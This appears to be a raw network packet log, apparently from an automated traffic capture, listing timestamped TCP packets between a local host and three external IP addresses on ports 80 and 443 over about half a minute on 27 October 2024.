                                                                                                                  Oct 27, 2024 19:22:29.469245911 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.469252110 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.470454931 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.470470905 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.470530987 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.470539093 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.470637083 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.470645905 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.470704079 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.470711946 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.470761061 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.470768929 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.470824957 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.470833063 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.470890999 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.470899105 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.470963001 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.470971107 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.471013069 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.471021891 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.471071959 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.471079111 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.471128941 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.471137047 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.471203089 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.471210957 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.471266985 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.471272945 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.471379042 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.471386909 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.471417904 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.471425056 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.471482038 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.471489906 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.471527100 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.471534967 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.471589088 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.471596956 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.474812031 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.474817991 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:30.364183903 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:30.364299059 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:30.365102053 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:30.365144968 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:30.365216970 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:42.598234892 CET4973980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:42.603636980 CET8049739188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:42.604154110 CET4973980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:42.604154110 CET4973980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:42.610213041 CET8049739188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:42.962435007 CET4973980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:42.968126059 CET8049739188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:43.219101906 CET8049739188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:43.305352926 CET4973980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:43.542912006 CET8049739188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:43.542956114 CET8049739188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:43.543124914 CET4973980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:43.731729031 CET4973980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:43.737209082 CET8049739188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:43.859299898 CET8049739188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:43.866652012 CET4973980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:43.872123957 CET8049739188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:44.171400070 CET8049739188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:44.305347919 CET4973980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:44.946980953 CET4973980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:44.948899031 CET4974280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:44.953006029 CET8049739188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:44.953078032 CET4973980192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:44.954463959 CET8049742188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:44.954554081 CET4974280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:44.954720974 CET4974280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:44.960064888 CET8049742188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:44.995366096 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:45.000806093 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.000874996 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:45.000946045 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:45.006300926 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.305644989 CET4974280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:45.313436985 CET8049742188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.352305889 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:45.360219955 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.360254049 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.549926996 CET8049742188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.597021103 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.664743900 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:45.696404934 CET4974280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:45.852617979 CET8049742188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.904166937 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.904325962 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:45.904481888 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.008512020 CET4974280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.348201036 CET4974280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.348388910 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.349253893 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.354486942 CET8049742188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:46.354557037 CET4974280192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.354811907 CET8049744188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:46.354929924 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.355014086 CET8049743188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:46.355076075 CET4974380192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.355181932 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.360619068 CET8049744188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:46.712167025 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:46.717921019 CET8049744188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:46.953052998 CET8049744188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:47.069375038 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.264524937 CET8049744188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:47.367862940 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.451494932 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.451936007 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.457434893 CET8049746188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:47.457474947 CET8049744188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:47.457561016 CET4974480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.457575083 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.457740068 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.463293076 CET8049746188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:47.805830002 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:47.811896086 CET8049746188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:48.058985949 CET8049746188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:48.195992947 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.371516943 CET8049746188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:48.508500099 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.657361031 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.657789946 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.663261890 CET8049746188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:48.663331032 CET4974680192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.663367033 CET8049747188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:48.663445950 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.663537979 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:48.669845104 CET8049747188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.008608103 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.015603065 CET8049747188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.264313936 CET8049747188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.367898941 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.582602978 CET8049747188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.664779902 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.759526968 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.759890079 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:49.759948969 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.760940075 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:49.764314890 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:49.764337063 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.765290976 CET8049747188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.769464016 CET4974780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.774657011 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.780139923 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.780261040 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.780354023 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.785792112 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.803361893 CET4975180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.808902979 CET8049751188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:49.811388969 CET4975180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.811465979 CET4975180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:49.819879055 CET8049751188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.150188923 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.155854940 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.155894995 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.155922890 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.155925035 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.155976057 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.156061888 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156090975 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156119108 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156121969 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.156147003 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156166077 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.156193018 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.156199932 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156228065 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156254053 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.156286001 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.156318903 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.161490917 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.161545038 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.161550045 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.161676884 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.161714077 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.161750078 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.161788940 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.161828995 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.161930084 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.161957979 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.161998987 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.190643072 CET4975180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.196115017 CET8049751188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.202502966 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.202621937 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.254647970 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.254772902 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.264822960 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.265019894 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.270878077 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.270909071 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.270967960 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.270994902 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271028042 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271055937 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271106005 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271138906 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271171093 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271271944 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271433115 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271460056 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271511078 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271538019 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271564007 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271590948 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271616936 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271663904 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271691084 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271718025 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271744013 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271770954 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271797895 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.271830082 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.383308887 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.398643970 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.398746014 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.400852919 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.400866032 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.401196003 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.426687956 CET8049751188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.461283922 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.507340908 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.508543015 CET4975180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.531064987 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.607523918 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.608937025 CET4434974934.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.609016895 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.611015081 CET49749443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.633193970 CET49752443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.633223057 CET4434975234.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.633339882 CET49752443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.634083986 CET49752443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:50.634095907 CET4434975234.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.643563032 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.643688917 CET4975180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.649317980 CET8049750188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.649391890 CET4975080192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.650047064 CET8049751188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.650114059 CET4975180192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.783277988 CET4975480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.788732052 CET8049754188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.788820982 CET4975480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.788919926 CET4975480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.795780897 CET8049754188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.916312933 CET4975580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.923177958 CET8049755188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:50.923244953 CET4975580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.923379898 CET4975580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:50.929055929 CET8049755188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.133835077 CET4975480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:51.140050888 CET8049754188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.242234945 CET4434975234.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.244062901 CET49752443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:51.244074106 CET4434975234.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.274605989 CET4975580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:51.280169010 CET8049755188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.280224085 CET8049755188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.390068054 CET4434975234.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.391635895 CET4434975234.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.391716003 CET49752443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:51.395399094 CET49752443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:51.405107975 CET4975480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:51.405128002 CET8049754188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.405185938 CET4975480192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:51.514448881 CET4975580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:51.519530058 CET8049755188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.519582033 CET4975580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:51.520159960 CET8049755188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.520215034 CET4975580192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:51.581273079 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:51.581296921 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.581490040 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:51.585203886 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:51.585213900 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.715761900 CET4975780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:51.721291065 CET8049757188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:51.721760035 CET4975780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:51.721949100 CET4975780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:51.727343082 CET8049757188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:52.072951078 CET4975780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:52.078612089 CET8049757188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:52.346030951 CET8049757188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:52.408610106 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:52.408720016 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:52.555377007 CET4975780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:52.558535099 CET8049757188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:52.558681965 CET4975780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:52.666775942 CET8049757188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:52.867886066 CET4975780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:52.922081947 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:52.922097921 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:52.922498941 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:52.923536062 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:52.923675060 CET4975780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:52.926768064 CET4975880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:52.929478884 CET8049757188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:52.929559946 CET4975780192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:52.932151079 CET8049758188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:52.932228088 CET4975880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:52.932419062 CET4975880192.168.2.4188.114.97.3
                                                                                                                  Oct 27, 2024 19:22:52.937763929 CET8049758188.114.97.3192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:52.967334986 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.156056881 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.160118103 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.160135031 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.160603046 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.160608053 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.160660982 CET49756443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:53.160664082 CET44349756149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:53.160773993 CET49756443192.168.2.4149.154.167.220
